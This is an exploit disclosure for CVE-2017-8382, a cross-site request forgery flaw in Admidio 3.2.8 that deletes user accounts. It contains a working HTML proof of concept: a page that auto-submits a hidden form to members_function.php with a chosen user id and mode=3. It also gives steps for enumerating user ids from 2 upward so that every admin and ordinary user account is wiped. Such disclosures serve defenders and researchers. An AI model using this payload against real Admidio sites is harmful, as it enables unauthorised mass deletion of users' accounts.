# Exploit Title :Admidio 3.2.8 (CSRF to Delete Users)# Date: 28/April/2017# Exploit Author: Faiz Ahmed Zaidi Organization: Provensec LLC Website:
http://provensec.com/# Vendor Homepage: https://www.admidio.org/# Software Link: https://www.admidio.org/download.php# Version: 3.2.8# Tested on: Windows 10 (Xampp)# CVE : CVE-2017-8382[Suggested description]
Admidio 3.2.8 has CSRF in
adm_program/modules/members/members_function.php with
an impact of deleting arbitrary user accounts.------------------------------------------[Additional Information]
Using this crafted html form we are able to delete any user with
admin/user privilege.<html><body onload="javascript:document.forms[0].submit()"><form
action="http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php"><inputtype="hidden" name="usr_id" value='9'/><inputtype="hidden" name="mode" value="3"/></form></body></html>[Affected Component]
http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php
------------------------------------------[Attack Type]
Remote
------------------------------------------[Impact Escalation of Privileges]
true
------------------------------------------[Attack Vectors]
Steps:1.) If an user with admin privilege opens a crafted
html/JPEG(Image),then both the admin and users with user privilege
which are mentioned by the user id(as like shown below)in the
crafted request are deleted.<inputtype="hidden" name="usr_id" value='3'/>2.) In admidio by default the userid starts from'0','1'for system '2'for users, so an attacker
can start from'2' upto 'n' users.3.)For deleting the user permanently we select 'mode=3'(as like shown
below),then all admin/low privileged users are deleted.<inputtype="hidden" name="mode" value="3"/>------------------------------------------[Reference]
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Thanks
Faiz Ahmed Zaidi
